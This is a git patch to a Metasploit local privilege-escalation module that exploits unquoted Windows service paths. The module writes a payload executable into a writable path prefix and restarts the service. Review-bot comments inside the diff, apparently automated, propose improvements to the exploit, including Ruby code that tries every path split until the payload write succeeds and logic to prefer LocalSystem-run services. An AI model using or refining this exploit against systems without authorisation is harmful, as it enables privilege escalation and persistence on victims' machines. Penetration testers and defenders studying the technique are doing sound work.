From 101e5a8ccfc9d3b736b8571d11a3930a8558ada8 Mon Sep 17 00:00:00 2001
From: Meatballs
Date: Tue, 17 Dec 2013 01:46:45 +0000
Subject: [PATCH] Tidyup trusted_service_path
Use filedropper, use service exe, dont migrate
---
.../windows/local/trusted_service_path.rb | 54 ++++---------------
1 file changed, 11 insertions(+), 43 deletions(-)
diff --git a/modules/exploits/windows/local/trusted_service_path.rb b/modules/exploits/windows/local/trusted_service_path.rb
index 61adb9f6a5..47cdae6c29 100644
--- a/modules/exploits/windows/local/trusted_service_path.rb
+++ b/modules/exploits/windows/local/trusted_service_path.rb
@@ -9,6 +9,7 @@ require 'msf/core/exploit/exe'
class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
+ include Msf::Exploit::FileDropper
include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Post::Windows::Services
@@ -44,10 +45,8 @@ class Metasploit3 < Msf::Exploit::Local
],
'Platform' => [ 'win'],
'Targets' => [ ['Windows', {}] ],
- 'SessionTypes' => [ "shell", "meterpreter" ],
+ 'SessionTypes' => [ "meterpreter" ],
'DefaultTarget' => 0,
- # Migrate away, in case the service dies (can kill access)
- 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }
))
end
@@ -77,8 +76,8 @@ class Metasploit3 < Msf::Exploit::Local
next if cmd !~ /^[a-z]\:.+\.exe$/i
next if not cmd.split("\\").map {|p| true if p =~ / /}.include?(true)
- vprint_status("Found vulnerable service: #{name} - #{cmd} (#{info['Credentials']})")
- vuln_services << [name, cmd]
+ vprint_status("Found vulnerable service: #{service[:name]} - #{cmd} (#{info[:startname]})")
+ vuln_services << [service[:name], cmd]
# This process can be pretty damn slow.
# Allow the user to just find one, and get the hell out.
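Review bot: The new `vuln_services << [service[:name], cmd]` drops the account that the same hunk now prints via `info[:startname]`, so nothing downstream can tell whether exploiting the service would actually escalate privileges — a service that starts as the current user gives no gain, and on the only-one fast path it is the only candidate ever tried. Consider recording it, `vuln_services << [service[:name], cmd, info[:startname]]`, so the caller can prefer LocalSystem/NetworkService entries; this assumes `service_info` returns the start account under `:startname`, as the message implies. The enclosing method starts and ends outside this hunk.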
@@ -95,63 +94,32 @@ class Metasploit3 < Msf::Exploit::Local
#
print_status("Finding a vulnerable service...")
svrs = enum_vuln_services(true)
- if svrs.empty?
- print_error("No service found with trusted path issues")
- return
- end
+
+ fail_with(Failure::NotVulnerable, "No service found with trusted path issues") if svrs.empty?
svr_name = svrs.first[0]
fpath = svrs.first[1]
exe_path = "#{fpath.split(' ')[0]}.exe"
- print_status("Placing #{exe_path} as #{svr_name}")
-
+ print_status("Placing #{exe_path} for #{svr_name}")
#
# Drop the malicious executable into the path
#
- exe = generate_payload_exe
+ exe = generate_payload_exe_service({:servicename=>svr_name})
print_status("Writing #{exe.length.to_s} bytes to #{exe_path}...")
begin
write_file(exe_path, exe)
+ register_files_for_cleanup(exe_path)
rescue Rex::Post::Meterpreter::RequestError => e
# Can't write the file, can't go on
- print_error(e.message)
- return
+ fail_with(Failure::Unknown, e.message)
end
-
#
# Run the service, let the Windows API do the rest
#
print_status("Launching service #{svr_name}...")
- tried = false
- begin
- status = service_start(svr_name)
- raise RuntimeError, status if status != Error::SUCCESS
- rescue RuntimeError => s
- if tried
- print_error("Unable to start #{svr_name}")
- return
- else
- tried = true
- end
-
- case s.message.to_i
- when Error::SERVICE_ALREADY_RUNNING
- service_stop(svr_name)
- retry
- when Error::SERVICE_DISABLED
- service_change_startup(svr_name, 'manual')
- retry
- end
- end
-
-
- #
- # "Nothing ever happened, we swears it on the Precious!"
- #
- print_status("Deleting #{exe_path}")
- file_rm(exe_path)
+ service_restart(svr_name)
end
end
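Review bot: `exe_path = "#{fpath.split(' ')[0]}.exe"` still tries only the first space in the unquoted path, so with the new `fail_with(Failure::Unknown, e.message)` in the `rescue` a single access-denied on a candidate like `C:\Program.exe` aborts the whole run, even though a later prefix (for a path such as `C:\Program Files\Vendor Name\App Dir\app.exe`, the candidate `C:\Program Files\Vendor Name\App.exe`) may sit in a directory the current user can write to. Windows resolves an unquoted path by trying each prefix in that same order, so the exploit should walk the candidates, settle on the first one `write_file` succeeds on, and only fail (with `Failure::NoAccess`) when none can be written. `register_files_for_cleanup` then has to be called on the path actually written, as the existing code does for the single candidate. The lines below replace the `exe_path`/`print_status`/`begin … end` section; the "Run the service" part is unchanged.
```ruby
    svr_name = svrs.first[0]
    fpath = svrs.first[1]
    exe = generate_payload_exe_service({:servicename=>svr_name})

    # Every space in the unquoted path is a split point Windows will try, in
    # order; use the first one whose directory we can actually write to.
    parts = fpath.split(' ')
    exe_path = nil
    (0...parts.length - 1).each do |i|
      candidate = "#{parts[0..i].join(' ')}.exe"
      print_status("Writing #{exe.length.to_s} bytes to #{candidate}...")
      begin
        write_file(candidate, exe)
      rescue Rex::Post::Meterpreter::RequestError => e
        vprint_error("Could not write #{candidate}: #{e.message}")
        next
      end
      register_files_for_cleanup(candidate)
      exe_path = candidate
      break
    end
    fail_with(Failure::NoAccess, "Unable to write a payload into any split of #{fpath}") if exe_path.nil?
    # … unchanged: "Run the service" comment, print_status("Launching service …"), service_restart …
```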